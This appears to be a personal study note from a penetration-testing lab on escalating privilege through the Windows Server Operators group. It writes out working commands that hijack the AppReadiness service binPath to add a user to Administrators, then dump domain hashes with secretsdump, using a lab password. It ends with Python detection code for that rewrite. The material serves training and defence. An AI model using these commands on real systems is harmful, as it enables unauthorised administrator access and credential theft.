# Intro

- The [Server Operators](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators) group allows members to administer Windows servers without needing assignment of Domain Admin privs
- It is a very highly privileged group that can log in locally to servers, including DCs
- Membership of this group confers the powerful `SeBackupPrivilege` and `SeRestorePrivilege` privs and the ability to control local services

# Example with `AppReadiness`

## Examine target service

- First, examine the `AppReadiness` service to confirm that it starts as SYSTEM

```cmd
sc qc AppReadiness
```

- Next, use the service viewer/controller [PsService](https://docs.microsoft.com/en-us/sysinternals/downloads/psservice), which is part of the Sysinternals suite, to check permissions on the service
- Note: `PsService` works much like the `sc` utility: it can display service status and configuration, and it can start, stop, pause, resume, and restart services both locally and on remote hosts

```cmd
c:\Tools\PsService.exe security AppReadiness
```

- The above confirms that the Server Operators group has [SERVICE_ALL_ACCESS](https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights) access rights, which gives us full control over the `AppReadiness` service

## Add target user to Admins group by modifying `binPath` for target service

- Now, confirm that the `server_adm` user is not yet in the Administrators group

```cmd
net localgroup Administrators
```

- Next, change the binary path to execute a command which adds the `server_adm` user to the default local Administrators group

```cmd
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
```

- If we try to start `AppReadiness`, it will fail, but recheck membership of the Administrators group anyway

```cmd-session
sc start AppReadiness
net localgroup Administrators
```

- As shown above, `server_adm` is now a member of the Administrators group

## Exploit new membership in Admins group

- Use `nxc` against the DC to see if `server_adm` has PWNED status
- If yes, retrieve NTLM password hashes with `secretsdump.py`

```bash
nxc smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!'
secretsdump.py [email protected] -just-dc-user administrator
```

---

# Exercise

- `ping` test

![[images/Pasted image 20260220194523.png]]

- `nmap` scan

![[images/Pasted image 20260220194552.png]]

- `rdp` into target with given creds
- Light internal enum

![[images/Pasted image 20260220194657.png]]

- We are in the `Server Operators` group, but `SeBackup` and `SeRestore` are disabled
- Enumerate the `AppReadiness` service
- `AppReadiness` starts as LOCALSYSTEM

![[images/Pasted image 20260220194923.png]]

- NOTE: When in a `cmd` session, we can simply use `sc`, but when in a `powershell` session, we need to use `sc.exe`
- `Server Operators` can do everything with the `AppReadiness` service (full control)

![[images/Pasted image 20260220195051.png]]

- Confirm `server_adm` is not in the Administrators group

![[images/Pasted image 20260220195134.png]]

- Modify the binary path for the `AppReadiness` service

![[images/Pasted image 20260220195212.png]]

- Start the `AppReadiness` service
- Failed as expected

![[images/Pasted image 20260220195306.png]]

- Confirm `server_adm` is now in the Administrators group

![[images/Pasted image 20260220195318.png]]

- Sign out and reconnect via `rdp`, then reconfirm group membership

![[images/Pasted image 20260220195456.png]]

- Now try to reach the flag in `\users\administrator\desktop` > YAHTZEE

![[images/Pasted image 20260220195545.png]]
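A defender-side addition that is not part of the original note: detection logic for the `binPath=` rewrite shown above. It checks Sysmon Event ID 13 (registry value set) on a service's `ImagePath` value for a shell one-liner and correlates it with a Security Event ID 4732 (member added to a security-enabled local group) targeting BUILTIN\Administrators. The sample events are constructed, and `DOMAIN` and the timestamps are placeholders.

```python
import re
ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators
# Sysmon Event ID 13 = registry value set (a service's binPath is its ImagePath value);
# Security Event ID 4732 = member added to a security-enabled local group.
IMAGE_PATH_RE = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)
SHELL_IN_BINPATH_RE = re.compile(
    r"\b(cmd(\.exe)?\s+/c|powershell|net1?\s+(localgroup|user))\b", re.IGNORECASE)
# Constructed sample telemetry (not taken from the note); DOMAIN is a placeholder.
SAMPLE_EVENTS = [
    {"ts": 10, "id": 13, "User": r"DOMAIN\server_adm",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\AppReadiness\ImagePath",
     "Details": "cmd /c net localgroup Administrators server_adm /add"},
    {"ts": 12, "id": 13, "User": r"NT AUTHORITY\SYSTEM",  # benign: a real binary path
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\ImagePath",
     "Details": r"C:\Windows\System32\spoolsv.exe"},
    {"ts": 40, "id": 4732, "TargetSid": ADMINISTRATORS_SID, "MemberName": "server_adm"},
    {"ts": 900, "id": 4732, "TargetSid": "S-1-5-32-555",  # Remote Desktop Users: ignore
     "MemberName": "helpdesk"},
]

def service_image_hijack(event):
    """Service name if a Sysmon 13 event set a service ImagePath to a shell one-liner."""
    if event.get("id") != 13:
        return None
    m = IMAGE_PATH_RE.search(event.get("TargetObject", ""))
    if not m or not SHELL_IN_BINPATH_RE.search(event.get("Details", "")):
        return None
    return m.group(1)

def admin_group_add(event):
    """Added member name if a 4732 event targets the local Administrators group."""
    if event.get("id") == 4732 and event.get("TargetSid") == ADMINISTRATORS_SID:
        return event.get("MemberName")
    return None

def correlate(events, window_s=300):
    """Pair each ImagePath hijack with an Administrators addition within window_s seconds after it."""
    events = sorted(events, key=lambda e: e["ts"])
    alerts = []
    for i, ev in enumerate(events):
        svc = service_image_hijack(ev)
        if svc is None:
            continue
        for later in events[i + 1:]:
            if later["ts"] - ev["ts"] > window_s:
                break
            member = admin_group_add(later)
            if member:
                alerts.append({"service": svc, "member": member, "changed_by": ev.get("User"), "ts": later["ts"]})
    return alerts
```

On a real host the same two signals come from a Sysmon registry rule on `HKLM\System\CurrentControlSet\Services\*\ImagePath` and from the "Audit Security Group Management" subcategory; reviewing Server Operators membership itself is the cheaper preventive control.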